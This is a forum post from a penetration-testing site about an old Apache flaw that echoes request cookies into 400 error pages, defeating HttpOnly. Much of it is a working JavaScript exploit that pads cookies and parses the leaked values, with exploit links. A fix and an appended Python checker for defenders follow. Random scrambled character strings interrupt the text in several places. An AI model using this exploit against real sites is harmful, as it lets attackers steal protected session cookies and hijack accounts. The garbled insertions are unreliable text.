中国网络渗透测试联盟

Title: Apache HttpOnly Cookie XSS cross-site vulnerability

Author: admin    Time: 2013-4-19 19:15
Title: Apache HttpOnly Cookie XSS cross-site vulnerability
Many applications, including a number of commercial and mature open-source CMS / article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing the user's cookie: HttpOnly prevents JavaScript from reading the cookie directly, which lowers the damage an XSS bug can do. The issue described here can be used to bypass that HttpOnly attribute.

Open a site in Chrome, press F12 to open the Developer Tools, switch to the Console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/
function setCookies(good) {
    // Construct the padding string used as the cookie value
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set ten padding cookies (or expire them again when good === true)
    for (i = 0; i < 10; i++) {
        var cookie;
        if (good) {
            // Expire the padding cookie
            cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        } else {
            // Set the padding cookie
            cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies() {
        var cookie_dict = {};
        // Only react on a 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Drop newlines and pick the <pre> block out of the error page
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove the "Cookie: " prefix
                content = content[1].replace("Cookie: ", "");
                // Strip our own padding cookies and split the rest on ';'
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add each remaining cookie to the object (cookies[i], not cookies, is split)
                for (var i = 0; i < cookies.length; i++) {
                    var s_c = cookies[i].split('=', 2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset the padding cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }

    // Make the XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();
9 Q3 S: x' ^& b# @! h
You will then see a lovely 400 error page containing the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

Fix:

Apache's official documentation offers four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:
; {, Y  T; P) y3 v# T
In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In testing, for the 400 error only method 2 is effective: the response then no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 "security test"
& W1 {# r% w! n2 l) W' ^
Of course, upgrading Apache to the latest version also works :).
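As an added example (not code from the post or from the gist it links), here is a Python check a defender can run to confirm the fix took effect: it parses a 400 response body the same way the PoC above does and reports whether any cookie material is echoed back. The two sample bodies are constructed here for illustration: the leaky one mimics the shape of the pre-fix Apache error page with its <pre>Cookie: ...</pre> block, the hardened one is what the post's ErrorDocument 400 "security test" line returns. The canary cookie name, the probe() helper and the 8190-byte figure (Apache's default LimitRequestFieldSize, which the padding cookies must exceed to trigger the 400) are my additions, not from the post.

```python
import http.client
import re
import sys

# Constructed sample of the kind of 400 page an unpatched Apache returned
# when a request header exceeded LimitRequestFieldSize: the offending header,
# cookies included, was echoed back inside <pre> tags.
LEAKY_400_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head><title>400 Bad Request</title></head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: xss0=xxxxxxxx; session_id=deadbeef1234; xss1=xxxxxxxx\n</pre>\n"
    "</p></body></html>\n"
)

# Constructed sample of the response once the post's fix is in place:
#   ErrorDocument 400 "security test"
HARDENED_400_BODY = "security test"

# Apache's default LimitRequestFieldSize (bytes); a header longer than this
# triggers the 400 whose body we inspect.
DEFAULT_LIMIT_REQUEST_FIELD_SIZE = 8190


def leaked_cookies(body):
    """Return {cookie_name: value} for cookies echoed back in a 400 page, or {}.

    Same parsing idea as the PoC, but read from the defender's side: we only
    want to know whether any cookie material reached the error page.
    Our own padding cookies (xssN=xxx...) are ignored.
    """
    flat = body.replace("\r", "").replace("\n", "")
    m = re.search(r"<pre>(.+?)</pre>", flat)
    if not m:
        return {}
    line = m.group(1).strip()
    if not line.startswith("Cookie:"):
        return {}
    found = {}
    for part in line[len("Cookie:"):].split(";"):
        part = part.strip()
        if not part or re.fullmatch(r"xss\d+=x*", part):
            continue
        name, _, value = part.partition("=")
        found[name] = value
    return found


def response_is_safe(body):
    """True when the 400 body carries no cookie material."""
    return not leaked_cookies(body)


def build_probe_cookie_header(canary="canary=probe-marker", size=8200):
    """Build a Cookie header long enough to exceed LimitRequestFieldSize.

    'canary' is a constructed marker cookie; if it shows up in the 400 page,
    the server is still echoing request headers into its error document.
    """
    parts = [canary]
    total = len(canary)
    i = 0
    while total < size:
        chunk = "xss%d=%s" % (i, "x" * 800)
        parts.append(chunk)
        total += len(chunk) + 2  # account for the '; ' separator
        i += 1
    return "; ".join(parts)


def probe(host, port=80, path="/"):
    """Send one oversized-Cookie request to a server under test and return
    (status, leaked_cookie_dict). An empty dict with status 400 means the
    ErrorDocument change (or the upgrade) is in effect."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", path, headers={"Cookie": build_probe_cookie_header()})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, leaked_cookies(body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        status, leaked = probe(sys.argv[1])
        print(status, "leaks cookies" if leaked else "safe", leaked)
    else:
        # Offline run over the constructed samples only
        print("leaky sample:", leaked_cookies(LEAKY_400_BODY))
        print("hardened sample safe:", response_is_safe(HARDENED_400_BODY))
```

Run it with a hostname to send the probe against a server under test; with no argument it only evaluates the constructed samples. The check deliberately keys on the <pre>Cookie: ...</pre> shape rather than on the words "Bad Request", because the post's fix changes the whole body to the custom message while leaving the status at 400, and that is exactly the combination that means the leak is closed.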
/ l, g) M# Z. d5 `- J, d
Reference: http://httpd.apache.org/security/vulnerabilities_22.html

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2